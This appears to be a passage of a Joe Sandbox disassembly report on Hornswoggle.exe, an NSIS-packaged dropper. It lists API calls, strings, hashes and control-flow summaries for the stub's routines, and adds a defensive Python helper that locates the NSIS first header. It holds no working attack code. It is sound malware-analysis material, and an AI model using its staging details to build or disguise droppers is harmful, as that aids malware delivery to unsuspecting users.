                                                        • Opcode Fuzzy Hash: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
                                                        • Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA
                                                        APIs
                                                        • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 0040211D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls
                                                        • API String ID: 123533781-254672218
                                                        • Opcode ID: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                        • Instruction ID: 56974f308a9a67f015f648966d3a58154011754483a046e15126684feee28a9b
                                                        • Opcode Fuzzy Hash: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                        • Instruction Fuzzy Hash: 255138B5A00208BFCF10DFA4C988A9D7BB5FF48318F20856AF515EB2D1DB799941CB54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                        • Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
                                                        • Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                        • Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(76003410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0), ref: 00406172
                                                        • FindClose.KERNEL32(00000000), ref: 0040617E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\
                                                        • API String ID: 2295610775-3404278061
                                                        • Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                        • Instruction ID: 121c98e09340d698ac486e65b2e2524f4cd38212b93dde10f2a633de382b9f18
                                                        • Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                        • Instruction Fuzzy Hash: 82D012319190207FC34117396C0C84B7A589F653317528B33F86AF52F0D3349CA286ED

                                                        Control-flow Graph (graph image not reproduced; node and edge listing follows)
                                                        control_flow_graph 177 403b75-403b87 178 403cc8-403cd7 177->178 179 403b8d-403b93 177->179 181 403d26-403d3b 178->181 182 403cd9-403d21 GetDlgItem * 2 call 404048 SetClassLongA call 40140b 178->182 179->178 180 403b99-403ba2 179->180 183 403ba4-403bb1 SetWindowPos 180->183 184 403bb7-403bba 180->184 186 403d7b-403d80 call 404094 181->186 187 403d3d-403d40 181->187 182->181 183->184 191 403bd4-403bda 184->191 192 403bbc-403bce ShowWindow 184->192 196 403d85-403da0 186->196 188 403d42-403d4d call 401389 187->188 189 403d73-403d75 187->189 188->189 210 403d4f-403d6e SendMessageA 188->210 189->186 195 404015 189->195 197 403bf6-403bf9 191->197 198 403bdc-403bf1 DestroyWindow 191->198 192->191 203 404017-40401e 195->203 201 403da2-403da4 call 40140b 196->201 202 403da9-403daf 196->202 206 403bfb-403c07 SetWindowLongA 197->206 207 403c0c-403c12 197->207 204 403ff2-403ff8 198->204 201->202 213 403fd3-403fec DestroyWindow KiUserCallbackDispatcher 202->213 214 403db5-403dc0 202->214 204->195 211 403ffa-404000 204->211 206->203 208 403cb5-403cc3 call 4040af 207->208 209 403c18-403c29 GetDlgItem 207->209 208->203 215 403c48-403c4b 209->215 216 403c2b-403c42 SendMessageA IsWindowEnabled 209->216 210->203 211->195 218 404002-40400b ShowWindow 211->218 213->204 214->213 219 403dc6-403e13 call 405e85 call 404048 * 3 GetDlgItem 214->219 220 403c50-403c53 215->220 221 403c4d-403c4e 215->221 216->195 216->215 218->195 247 403e15-403e1a 219->247 248 403e1d-403e59 ShowWindow KiUserCallbackDispatcher call 40406a EnableWindow 219->248 225 403c61-403c66 220->225 226 403c55-403c5b 220->226 224 403c7e-403c83 call 404021 221->224 224->208 228 403c9c-403caf SendMessageA 225->228 230 403c68-403c6e 225->230 226->228 229 403c5d-403c5f 226->229 228->208 229->224 234 403c70-403c76 call 40140b 230->234 235 403c85-403c8e call 40140b 230->235 245 403c7c 234->245 235->208 244 403c90-403c9a 235->244 244->245 245->224 247->248 251 403e5b-403e5c 248->251 252 403e5e 248->252 253 403e60-403e8e GetSystemMenu EnableMenuItem SendMessageA 251->253 252->253 254 403e90-403ea1 SendMessageA 253->254 255 403ea3 253->255 256 403ea9-403ee2 call 40407d call 405e63 lstrlenA call 405e85 SetWindowTextA call 401389 254->256 255->256 256->196 265 403ee8-403eea 256->265 265->196 266 403ef0-403ef4 265->266 267 403f13-403f27 DestroyWindow 266->267 268 403ef6-403efc 266->268 267->204 270 403f2d-403f5a CreateDialogParamA 267->270 268->195 269 403f02-403f08 268->269 269->196 271 403f0e 269->271 270->204 272 403f60-403fb7 call 404048 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 270->272 271->195 272->195 277 403fb9-403fcc ShowWindow call 404094 272->277 279 403fd1 277->279 279->204
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
                                                        • ShowWindow.USER32(?), ref: 00403BCE
                                                        • DestroyWindow.USER32 ref: 00403BE2
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
                                                        • GetDlgItem.USER32(?,?), ref: 00403C1F
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403C3A
                                                        • GetDlgItem.USER32(?,00000001), ref: 00403CE8
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403CF2
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
                                                        • GetDlgItem.USER32(?,00000003), ref: 00403E03
                                                        • ShowWindow.USER32(00000000,?), ref: 00403E24
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E36
                                                        • EnableWindow.USER32(?,?), ref: 00403E51
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
                                                        • EnableMenuItem.USER32(00000000), ref: 00403E6E
                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
                                                        • lstrlenA.KERNEL32(Festremser Setup: Completed,?,Festremser Setup: Completed,00422F20), ref: 00403EC2
                                                        • SetWindowTextA.USER32(?,Festremser Setup: Completed), ref: 00403ED1
                                                        • ShowWindow.USER32(?,0000000A), ref: 00404005
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID: Festremser Setup: Completed
                                                        • API String ID: 3282139019-4016300305
                                                        • Opcode ID: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
                                                        • Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
                                                        • Opcode Fuzzy Hash: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
                                                        • Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E

                                                        Control-flow Graph

                                                        • Rendered control-flow graph not reproduced. Function 0x4037e3–0x403aa7 is the installer's UI set-up: it resolves imports through 0x4061fc (GetModuleHandleA/GetProcAddress), handles path strings (lstrcatA, lstrlenA, lstrcmpiA against ".exe", GetFileAttributesA), loads icon resource 0x67 with LoadImageA, registers the "_Nb" window class (RegisterClassA, CreateWindowExA), looks up the RichEdit20A/RichEdit classes with GetClassInfoA, and runs the main dialog with DialogBoxParamA using 0x403b75 as its procedure before calling 0x403733. Internal routines: 0x403aa8, 0x4058d5, 0x405900, 0x40591c, 0x4059c3, 0x405d4a, 0x405dc1, 0x405e63, 0x405e85, 0x40514e, 0x40618e, 0x40140b.
                                                        APIs
                                                          • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                          • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                        • lstrcatA.KERNEL32(1033,Festremser Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Festremser Setup: Completed,00000000,00000002,76003410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Hornswoggle.exe",00000000), ref: 0040385E
                                                        • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,1033,Festremser Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Festremser Setup: Completed,00000000,00000002,76003410), ref: 004038D3
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
                                                        • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038F1
                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises), ref: 0040393A
                                                          • Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE
                                                        • RegisterClassA.USER32(00422EC0), ref: 00403977
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
                                                        • ShowWindow.USER32(00000005,00000000), ref: 004039FA
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
                                                        • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
                                                        • RegisterClassA.USER32(00422EC0), ref: 00403A3C
                                                        • DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Control Panel\Desktop\ResourceLocale$Festremser Setup: Completed$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 1975747703-964347954
                                                        • Opcode ID: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
                                                        • Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
                                                        • Opcode Fuzzy Hash: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
                                                        • Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D

                                                        Control-flow Graph

                                                        • Rendered control-flow graph not reproduced. Function 0x402cb6–0x402f59 is the installer entry routine: it records GetTickCount, opens its own image (GetModuleFileNameA, 0x405ad6 for GetFileAttributesA/CreateFileA, GetFileSize), then walks the file comparing the words "Inst", "soft" and "Null" (xrefs 0x402d9d, 0x402da6, 0x402daf) to locate the embedded installer data; on success it allocates with GlobalAlloc, creates a temporary file under C:\Users\user\AppData\Local\Temp\ via CreateFileA and calls 0x402f5c. Failure paths lead to the strings "Error launching installer" (0x402d06), "Error writing temporary file..." (0x402ebf) and "Installer integrity check has failed..." (0x402f0d). Internal routines: 0x402c17, 0x4031cd, 0x4031e3, 0x405a91, 0x405b05, 0x4062df, 0x406271.
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402CCA
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Hornswoggle.exe,00000400), ref: 00402CE6
                                                          • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
                                                          • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00402D2F
                                                        • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E76
                                                        Strings
                                                        • C:\Users\user\Desktop\Hornswoggle.exe, xrefs: 00402CD0, 00402CDF, 00402CF3, 00402D10
                                                        • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
                                                        • soft, xrefs: 00402DA6
                                                        • Inst, xrefs: 00402D9D
                                                        • Null, xrefs: 00402DAF
                                                        • "C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00402CB6
                                                        • C:\Users\user\Desktop, xrefs: 00402D11, 00402D16, 00402D1C
                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
                                                        • Error launching installer, xrefs: 00402D06
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402CC0, 00402E8E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Hornswoggle.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                                        • API String ID: 2803837635-3711215968
                                                        • Opcode ID: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                        • Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
                                                        • Opcode Fuzzy Hash: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                        • Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C
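The entry routine above reads the installer's own image back (GetModuleFileNameA, GetFileSize, CreateFileA via 0x405ad6) and compares the words "Inst", "soft" and "Null" at 0x402d9d, 0x402da6 and 0x402daf, falling through to the "Installer integrity check has failed" message: that is the search for the NSIS first header that every NSIS stub performs at start-up, and it is the quickest way to confirm an NSIS-built dropper and find where its payload begins. The Python below is an added triage helper, not code from the sample, from Joe Sandbox or from NSIS. It assumes the first-header layout from NSIS's fileform.h (flags, siginfo 0xDEADBEEF, the three words "Null" "soft" "Inst", length_of_header, length_of_all_following_data) and its four flag bits; the "fits inside the file" acceptance test is this example's own simplification of the stub's checks, and the sample buffer it scans is constructed here.

```python
"""Locate and decode the NSIS first header that an NSIS stub validates at start-up.

Added triage helper; layout and flag bits are assumed from NSIS fileform.h.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

# Little-endian 0xDEADBEEF followed by "NullsoftInst" (assumed layout, see docstring).
NSIS_SIG = b"\xEF\xBE\xAD\xDE" + b"Null" + b"soft" + b"Inst"
FIRSTHEADER_FMT = "<I4s4s4s4sII"   # flags, siginfo, nsinst[3], header len, following len
FIRSTHEADER_SIZE = struct.calcsize(FIRSTHEADER_FMT)  # 28 bytes

# Flag bits as defined in fileform.h (assumed; only the low nibble is defined).
FLAG_NAMES = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}


@dataclass
class NsisFirstHeader:
    offset: int            # file offset of the flags dword (start of the first header)
    flags: int
    header_length: int     # length_of_header: size of the install header block
    following_length: int  # length_of_all_following_data: first header + header + data

    def flag_names(self) -> List[str]:
        return [name for bit, name in FLAG_NAMES.items() if self.flags & bit]


def find_nsis_firstheader(data: bytes) -> Optional[NsisFirstHeader]:
    """Return the first plausible first header in `data`, or None.

    A hit is accepted only when length_of_all_following_data fits inside the
    remaining file; this is the cheap structural check. The CRC that NSIS stores
    unless NO_CRC is set is not verified here.
    """
    pos = data.find(NSIS_SIG)
    while pos != -1:
        start = pos - 4  # the flags dword precedes the signature
        if start >= 0 and start + FIRSTHEADER_SIZE <= len(data):
            flags, _sig, _n1, _n2, _n3, hlen, total = struct.unpack_from(
                FIRSTHEADER_FMT, data, start)
            if 0 < hlen < total and start + total <= len(data):
                return NsisFirstHeader(start, flags, hlen, total)
        pos = data.find(NSIS_SIG, pos + 1)
    return None


def scan_file(path: str) -> Optional[NsisFirstHeader]:
    """Scan a file on disk (for example a dropped NSIS installer) for the first header."""
    with open(path, "rb") as fh:
        return find_nsis_firstheader(fh.read())


def build_sample(flags: int = 0, stub_size: int = 0x200, header_len: int = 64,
                 data_len: int = 200) -> bytes:
    """Constructed test input: a fake stub followed by a synthetic first header and payload."""
    total = FIRSTHEADER_SIZE + header_len + data_len
    first_header = struct.pack(FIRSTHEADER_FMT, flags, b"\xEF\xBE\xAD\xDE",
                               b"Null", b"soft", b"Inst", header_len, total)
    return b"MZ" + b"\x00" * (stub_size - 2) + first_header + b"H" * header_len + b"D" * data_len


if __name__ == "__main__":
    hit = find_nsis_firstheader(build_sample(flags=4))
    print(hit, hit.flag_names() if hit else None)
```

On a real sample the offset returned is where the stub's own code ends and the installer data begins; everything from there to the end of the file is what the stub feeds to its header parser, so a truncated or tampered file fails the length check just as the stub reports "Installer integrity check has failed".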

                                                        Control-flow Graph

                                                        • Rendered control-flow graph not reproduced. Function 0x405e85–0x4060cb expands strings into paths: it branches on GetVersion, fills the buffer from GetSystemDirectoryA, GetWindowsDirectoryA or SHGetSpecialFolderLocation/SHGetPathFromIDListA (freeing the PIDL with CoTaskMemFree), appends "\Microsoft\Internet Explorer\Quick Launch" with lstrcatA where that folder is requested, and finishes with lstrlenA. It calls itself recursively (blocks 0x405f98 and 0x406080) and the helpers 0x405d4a, 0x405dc1, 0x405e63 and 0x4060ce; both the dialog procedure and the file-extraction routine call it.
                                                        APIs
                                                        • GetVersion.KERNEL32(?,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,004050B4,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000), ref: 00405F36
                                                        • GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FB1
                                                        • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FC4
                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
                                                        • SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ), ref: 0040600E
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00406019
                                                        • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
                                                        • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,004050B4,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000), ref: 0040608D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                        • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$error
                                                        • API String ID: 900638850-1737693607
                                                        • Opcode ID: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
                                                        • Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
                                                        • Opcode Fuzzy Hash: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
                                                        • Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E

                                                        Control-flow Graph

                                                        • Rendered control-flow graph not reproduced. Function 0x401751–0x4028de is the file-extraction step: it builds the destination path with lstrcatA (C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls appears in the call arguments), compares timestamps with CompareFileTime before overwriting, opens the target through 0x405ad6 (GetFileAttributesA/CreateFileA), calls 0x402f5c (the same routine the entry function calls after its CreateFileA), applies SetFileTime and CloseHandle, and reports progress through 0x40507c (SetWindowTextA/SendMessageA to the status controls). Internal routines: 0x402a3a, 0x405942, 0x405e63, 0x4058d5, 0x4060ce, 0x406167, 0x405ab1, 0x405659, 0x405e85.
                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,00000031), ref: 00401790
                                                        • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,00000031), ref: 004017BA
                                                          • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
